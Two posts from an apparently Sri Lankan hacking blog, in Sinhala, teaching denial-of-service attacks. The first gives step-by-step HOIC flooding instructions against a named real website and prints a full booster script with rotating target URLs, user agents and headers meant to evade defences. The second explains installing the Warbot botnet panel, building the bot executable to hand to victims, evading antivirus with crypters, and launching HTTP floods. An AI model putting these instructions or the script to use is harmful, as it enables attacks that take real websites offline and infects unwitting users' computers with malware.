Friday, May 16, 2014

DDoS ඇටෑක් එකක් දෙමුද ? HOIC


 ගෙවී ගිය අවුරුදු කීපය තුළ දැවන්තම සයිබර් ප්‍රහාරය!
හැබැයි එව්වනං ගැහුවෙ බොට් එහෙම දාලා. මෙකෙනුත් ගැහුවා FBI එකට.
හෑ... මේ මොකක්ද කියන්නෙ?ඇයි කාටවත් කියන්න ඕන නෑනෙ DDoS ගැන, හැමෝම දැං ඕක ගැන දන්නවනෙ. හා කෙටියෙං කියන්නං මේකෙං කරන්නෙ වෙබ් අඩවියකට ට්‍රැෆික් එකක් දෙන එක. හැක් හොද දරුණු ට්‍රැෆික් එකක් අස්සෙං යන්න පුළුවන්ද? බෑනෙ. තා පහදන්න ඕනෙයි? බෑ මම දන්නෙ නෑ...
බොට් නෙට් භාවිතා නොකර DDoS ගහන්න පුළුවන් හොදම ටූල් එකක් තමයි HOIC කියන්නෙ. මම HOIC වැඩකරන හැටි(සිද්ධාන්ත) දන්නෙ නෑ. ඒත්, වැඩ කරවගන්න හැටි කියාදෙන්නං.

මුලිංම අවශ්‍යය හතුරු අඩවියේ ලිංකුව ගන්න. ලිංකුවේ http:// හෝ https:// තිබිය යුතුය. http://hotldv.blogspot.com/
පසුව HOIC රන් කරලා දකුණෙ පහල තියෙන “ + “ ලකුණ ඔබලා එන වින්ඩෝවෙ URL යටතෙ එම ලිංකුව Past (Ctrl+V) කරන්න.
ඊළඟට Power යටතෙ ඔයාට අවශ්‍යය බලය දෙන්න. High තමා හොදම ඒත් ඔයාගෙ පරිගණකය ස්ලෝ වේවි. ඒක නිසා Medium දෙන්න. Booster එකක් දැම්මොත් තවත් සාර්ථකයි. අපිට ඒ පිළිබද දැනුමක් නෑ... ඒක එහෙම්මම තීන්න ඇරලා Add ඔබන්න.
මීළඟට THREADS ගාන දෙන්න. ප්‍රමාණෙ වැඩිවන තරමට තමා හොද. ඒත් පෙර පරිදිම ඔයාගෙ පරිගණකය ස්ලෝ වෙන්න පුළුවන්. ඒක නිසා 4-5ක් විතර ඇති.
හරි! දැං ප්‍රහාරය අරඹන්න. FIRE TEH LAZER! මත ඔබන්න.
Booster එකක් දැම්මොත් හොදයි කීවනෙ දැං බලමු එයිංකක් හදන හැටි. පහත කෝඩ් එක බලන්න. දිගයි කරන්න දෙයක් නෑ...
Dim useragents() as String
Dim referers() as String
dim randheaders() as string
Dim randURLs() as string

// populate rotating urls
// IF YOU WANT TO IMPROVE THE ATTACK, ADD URLS BELONGING TO THIS DOMAIN OR RELATED SUBDOMAINS!!! PRO-TIP: You should create anew target and .HOIC file if u want to attack a different organization
randURLs.Append "http://hotldv.blogspot.com/"
randURLs.Append "http://www.hotldv.blogspot.com/2012/08/copy.html"
randURLs.Append "http://www.hotldv.blogspot.com/search/label/Games"
randURLs.Append "http://hotldv.blogspot.com/p/functiond-s-id-var-js-fjs-d.html"


// rotate out url
URL =  randURLs(RndNumber(0, randURLs.UBound))

// EDIT THE FOLLOWING STRINGS TO MAKE YOUR OWN BOOST UNIQUE AND THEREFORE MORE EVASIVE!

// populate list
useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
useragents.Append "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
useragents.Append "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
useragents.Append "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
useragents.Append "Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 5.1; .NET CLR 1.1.4322)"
useragents.Append "Googlebot/2.1 ( http://www.googlebot.com/bot.html) "
useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14"
useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.600.0 Safari/534.14"
useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13"
useragents.Append "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Ubuntu/10.04 Chromium/9.0.595.0 Chrome/9.0.595.0 Safari/534.13"
useragents.Append "Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50727)"
useragents.Append "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; Media Center PC 4.0; SLCC1; .NET CLR 3.0.04320)"
useragents.Append "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; zh-cn) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5"
useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0 Safari/533.16"
useragents.Append "Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51"
useragents.Append "Mozilla/5.0 (Windows NT 5.1; U; Firefox/5.0; en; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.53"

// populate referer list
referers.Append "https://www.google.lk/search?q=Hotldv+Web+Solution"
referers.Append "https://www.google.lk/search?q=Hotldv+Web+Solution+sri+lanka"



// Add random headers
randheaders.Append "Cache-Control: no-cache"
randheaders.Append "If-Modified-Since: Sat, 29 Oct 1994 11:59:59 GMT"
randheaders.Append "If-Modified-Since: Tue, 18 Sep 2002 10:34:27 GMT"
randheaders.Append "If-Modified-Since: Mon, 12 Aug 2004 12:54:49 GMT"
randheaders.Append "If-Modified-Since: Wed, 30 Jan 2000 01:21:09 GMT"
randheaders.Append "If-Modified-Since: Tue, 18 Aug 2006 08:49:15 GMT"
randheaders.Append "If-Modified-Since: Fri, 20 Oct 2006 09:34:27 GMT"
randheaders.Append "If-Modified-Since: Mon, 29 Oct 2001 05:17:09 GMT"
randheaders.Append "If-Modified-Since: Tue, 18 Apr 2003 12:54:49 GMT"
randheaders.Append "If-Modified-Since: Sat, 18 Aug 2002 12:54:49 GMT"
randheaders.Append "If-Modified-Since: Wed, 30 Jan 2000 01:21:09 GMT"
randheaders.Append "If-Modified-Since: Tue, 18 Aug 2009 08:49:15 GMT"
randheaders.Append "If-Modified-Since: Fri, 20 Jun 2006 09:34:27 GMT"
randheaders.Append "If-Modified-Since: Sun, 13 Oct 2007 11:59:59 GMT"
randheaders.Append "If-Modified-Since: Tue, 18 Aug 2003 12:54:49 GMT"
randheaders.Append "If-Modified-Since: Wed, 30 Jan 2002 01:21:09 GMT"
randheaders.Append "If-Modified-Since: Tue, 18 Aug 2009 08:49:15 GMT"
randheaders.Append "If-Modified-Since: Fri, 20 Oct 2008 09:34:27 GMT"
randheaders.Append "If-Modified-Since: Mon, 29 Oct 2007 11:59:59 GMT"
randheaders.Append "If-Modified-Since: Tue, 18 Aug 2001 12:54:49 GMT"

Headers.Append "Keep-Alive: 115"
Headers.Append "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Headers.Append "Connection: keep-alive"

// ------------------ DO NOT EDIT BELOW THIS LINE

// generate random referer
Headers.Append "Referer: " + referers(RndNumber(0, referers.UBound))
// generate random user agent (DO NOT MODIFY THIS LINE)
Headers.Append "User-Agent: " + useragents(RndNumber(0, useragents.UBound))
// Generate random headers
Headers.Append randheaders(RndNumber(0, randheaders.UBound))

ඔය කොඩිං ඒකේ // populate rotating urls යටතෙ තිබෙන randURLs.Append ඉදිරියේ දැක්වෙන පරිදි " " ලෙස කමා තුළ හතුරු අඩවියේ ලිංකු දාන්න ඕන.
උදා:-
අඩවියේ ප්‍රධාන ලිංකුව, ලේබල් ලිංකු, පේජ් ලිංකු.... වැනි දෑ
අපිට ඕන හැටියෙ ඔතන randURLs.Append ලෙස පේළි දමමිං හතුරු අඩවියේ ඕනෑම ලිංකු ප්‍රමාණයක් ඇතුලක් කළ හැක. වෙබ් අඩවි scan කරන එව්වයිං ඔය හැම ලිංකුවක්ම ගත හැකි. එයිං හොදම එක තමා Acunetix Web Vulnerability Scanner (මේ තීන්නෙ මම චැනල් 4ට ගත්තු ලිංකු ඕන කෙනෙක් ඉන්නවනං මෙහෙයුම ආයෙ පටං ගන්න.)

ඊළඟට තිබෙන // populate referer list යටතෙ එම අඩවිය රෙෆ(ර්) කරන ගූගල් සර්ච් එනිජිම, නැතිනං වෙනත් අඩවි එක් කරන්න පුළුවන්. ඒකියන්නෙ ගූගල්හි විවිධ ලෙස සෙවුම් දමමිං ලිංකු ඇතුළත් කරන්න පුළුවන්. කලිං පරිදි referers.Append ඉදිරියේ " " ලෙස කමා යොදා ඕනෑ තරම් ලිංකු යෙදිය හැක.
ඉවරයි.

ආ මේ ඕක නෝට් පෑඩ් එකේ කරලා .hoic විදියට සේව් කර ගන්න ඇ.
උදා:- hotldv.hoic

එහෙම සේව් කරලා hoic.exe ෆයිල් එක තීන ෆෝල්ඩර් එකටම ඒක දාන්න. දැං පෙර පරිදිම URL, Power අනං මනං හදලා හතුරු .hoic එකත් තෝරලා දෙන්න.
  
තනියෙං කල්ලා අඩිවියක් හිට්ටන්න බෑ ඈ. කට්ටිය හැකිතාක් වැඩිවෙන තරමට තමා සාර්ථක.

ආ මෙන්න අහුවුණොත් දඩේ හූ ඇ. රතුපාටිං කොටු කරලා තීන්නෙ.

Download HOIC

 ඒනං පට්ට දිග වගේ පෙණුන පෝස්ටුව ඉවරයි ඇ. පිට් තමා ජයවේවා!

Sunday, May 4, 2014

බොට්නෙට් එකක් හදමු - DDOS

image

කවුරුත් ආසයිනෙ ඉතිං මේවට. මේක ඉගෙනගන්න IP හයිඩ් නොකර කරාට අවුලක් නෑ. ඒත් සිරාවට IP හයිඩ් නොකර කරලා බොට්ස් ලා හිටියොත් නඩුම තමා.
ඉතිං මේ අතරිං හොදම බොට් ස්ක්‍රිප්ට් එකක් තමයි zeus කියන්නෙ.මෙතන්ට ගියොත් zeus ගෙ කෙරුවාව බලාගත හැකි. ඒක ලොකෙ බෙහෙවින්ම නීති විරෝධීයි. තවතීනවා warbot, cythosia කියලා දෙකකුත් තව ඇති. මම දන්නෙ නෑ. මම කියා දෙන්න යන්නෙ warbot එක ඉන්ස්ටෝල් කරන හැටි.
ඒ ගමනම කියන්න ඕනෙ ලංකාවෙ ඉන්නවා ඔහොම බොට් තියෙන උදවිය හරි යම් බොට් එකක පාලනේ හිමි අය හරි එහෙමත් නැතිනම් පිටරට බොට් කරන කෙනෙක් අදුරන අය හරි. ඉතිං මේ කට්ටිය බොහෝදුරට ලංකාවෙ වෙබ් අඩවි කරන අය. මේ අය මොකද කරන්නෙ යම් ලාංකික අඩවියක් ඔවුන්ට වඩා ඉදිරියට එනවනම් තීන පහත් කුහක කමට DDOS ඇටෑක් එකක් අර නැගී එන අඩවියට එල්ල කොට එය අඩපණ කරනවා.මචංලා කවදාවත් ඒ තැනට වැටෙන්න එපා. යම් හේතුවක් මත පමණක් DDOS කරපං

මොනවද බොට් එකකින් කරන්න පුළුවන්,

කෙලිංම කීවොත් ඕක ප්‍රසිද්ධ කවුරුත් දන්න DDOS වලටනෙ. ඊට අමතරව ඕකෙන් ඊමේල් ස්පෑම් කරලා සල්ලි හොයන්න පුළුවන්. ඒකියන්නෙ යම් ප්‍රසිද්ධ සමාගමක් මේ නිර්ණාමික බොට් මෙහෙයුම් කරුවෙක් අල්ලගෙන ඔවුන්ට මුදල් දීලා තම දැන්වීම විසි තිස්දාහකට නෙවෙ ලක්ෂගානකට ඊමේල් කරනවා. එහෙම බොට් තීන අය spammers ලා කියලා හදුන්වනවා. එහෙම ඊමෙල් ඔබටත් දිනපතා බොහෝදුරට එනවා දැං අපි කතා කරන්න යන එකෙන් පුළුවන් DDOS විතරයි. මම ඔය ඊමේල් කෙරුවාව ගැන අවබෝධයක් නෑ. ඒක නිසා අහන්න එපා. දැනගත්තු දාට කියන්නම්. ආ DDOS කරලත් සල්ලි හොයතෑකි ඔය ක්‍රමේටම. ඔය zeus එකේ DDOS බෑ මයෙ හිතේ ඒකෙ වෙන සීන් එකක්. සිංහලෙන් කියන්න අමාරුයි. මෙතෙන්ට (wiki) ගියානං යම් අවබෝධයක් ලැබෙයි

WARBOT Install කරමු.

මේ සදහා ඔයාට වෙබ් හොස්ට් එකක් ඕන PHP සහ MySQL හෝස්ට් කරන. ඔයාට නොමිලේ ඕනනම් පහත ඕන ඒකක් භාවිතා කල හැක. ඒත් ඔයාට මේක දියුණු කරන් කරගෙන යන්න ඕනනම් ගෙදර වෙබ් සර්වරයක් දාන්න වෙයි.
3owl.com
www.000webhost.com
fav.cc

ඔය දක්වපුවයින් සමහර ඒවායෙ SLT එකෙන් ගිණුම් හදන්න බෑ. මොකද ඒ අය SLT IP බ්ලොක් කරලා. ඒකෙන්ම පේනවනෙ ලංකාවෙ ගොයියන්ගෙ තරම.

000webhost එකේ ගිණුමක් හැදුවා. ඒකෙන් තමා කියා දෙන්නෙ. ඔයත් ඒකෙනම් හැදුවෙ මෙතනින් ගිහින් අළුත් ඩොමේන් එකක් හදාගන්න. DDOS ගහන්නම හදනවනං IP hide කරලා virtual PC එකක කරන්න. මම සිරාවට නෙවෙ උණත් කරන්නෙ virtual PC එකක මොකද ඇන්ටි වෛරස් වැඩසටහන අපිට මේ සදහා අවශ්‍ය දේවල් රිමූ කරනවා.
මුලින්ම මේ zip ෆයිල් එක බාගෙන ඇන්ටි වෛරස් නොමැති තැනක එක්ස්ට්‍රැක් කර ගන්න.

දැං 000webhost කන්ට්‍රෝල් පැනල් එකට ගිහින් MySQL ඩේටාබේස් එකක් හදාගන්න ඕන. පහත රූප බලන්න. (වඩාත් පැහැදිලි වීමට රූප මත ඔබන්න.)

image

MySQL මත ඔබා යන්න.

image

ඔබ ට අවශ්‍යය පරිදි තොරතුරු ලබාදෙන්න.
පසුව Create database මත ඔබන්න.

image

ඉදිරි ප්‍රයෝජනය සදහා රතුපාටින් කොටු කර ඇති ප්‍රෙද්ෂය note pad එකට හෝ කොහේට හරි කොපි කර තබා ගන්න.

දැං නැවත 000webhost කන්ට්‍රොල් පැනල් එකට යන්න.

image

File Manager මත ඔබන්න.

image

File Manager මේ විදියට පෙන්නාවි. දැං public html folder එක මත ඔබා එයට පිවිසෙන්න.

දැං Upload යන්න මත ඔබන්න.

image

දැං දකුණු පස ඇති ස්ථානයට මම දීපු zip ෆයිල් එක ඇතුලෙ ඇති තව wbc කියලා zip එකක් ඒක තෝරලා දෙන්න. (wbc ඔයාට ඕන හැටියෙ රීනේම් කල හැක) පස්සෙ උඩ තියෙන හරි ලකුණ ඔබන්න.

image

ඔක්කොම හරියට අප්ලෝඩ් උනානං error නැතුව මෙහෙම පෙන්නාවි. දැං ඊතල සලකුණ ඔබලා බැක් වෙන්න.

දැං පහත විදියට ඔයාගෙ ඩොමේන් එකට යන්න.
http://yourdomain.com/wbc/install/index.php

image

හරියට තැනට ගියානං මෙහෙම ඒවි. දැං ඔයා කලිං නෝඩ්පෑඩ් එකේ සේව් කරගත් තොරතුරු සහ අළුත් යූසර් නේම් එකක් සහ පාස්වර්ඩ් එකක් ලබාදී install මත යන්න. ඔබන්න. වැඩේ හරි නම්, installation complete හරි successfully කියලා මැසේජ් එකක් බ්‍රව්සරේ වම්පැත්තෙ උඩිං එයි.

දැං ආයෙ file manager වලට යන්න public html > wbc එක ඇතුලට.

image

ඔහොම තියේවි install folder එකට tick එක දාලා delete කරන්න.

වැඩ ඉවරයි. දැං ඔයාට http://yourdomain.com/wbc කියන තැනට ගිහිං ඔයා install කරද්දි දීපු යූසර් පාස්වර්ඩ් ගහලා ලොග් වෙත හැක.

දැං තියෙන්නෙ වෛරස් එක හදාගන්න විදිය මම දීපු zip එක ඇතුලෙ ඇති bot කියලා folder එකක් ඕක ඇතුලෙ ඇති builder සහ original කියලා file දෙකක්. ඕකෙන් ඉස්සෙල්ල කියන original එක run කරලා පස්සේ builder රන් කරන්න. cmd එක එයි.


image

රූපෙ පරිදි තොරතුරු පුරවලා enter දිදී යන්න වැඩේ අහවර වෙලා cmd එක ඉබේ වැහෙයි. දැං කලිං කී original.exe එක තමා ඔයාගෙ වෛරස් එක. ඕන කෙනෙක්ට දෙන්න. එයා ඒක ක්ලික් කර ගමන් එයා ඔයාගෙ බූටෙක්

image

හැබැයි වෛරස් ගාඩ් එක්කනම් බෑ..................
ඔවා සාර්ථක කරගන්න icon changer, crypter වගේ ටූල් භාවිතා කල හැක.

image

මේක තමා කන්ටෝල් පැනලෙ. ඔයාගෙ ඔන්ලයිං ඉන්න බොට්ලා අරම පෙන්නනවා.
ඔතනින් HTTP flood මත ඔබලා අවශ්‍යය තොරතුරු සපයලා attack කරන්න පුළුවන්.

image

Copyright (c) 2015 SL Cyber King. Designed by Pinsara Udara Panditha Web Design slcyberking.blogspot.com. Awesome Inc. template. Powered by Sl Cyber King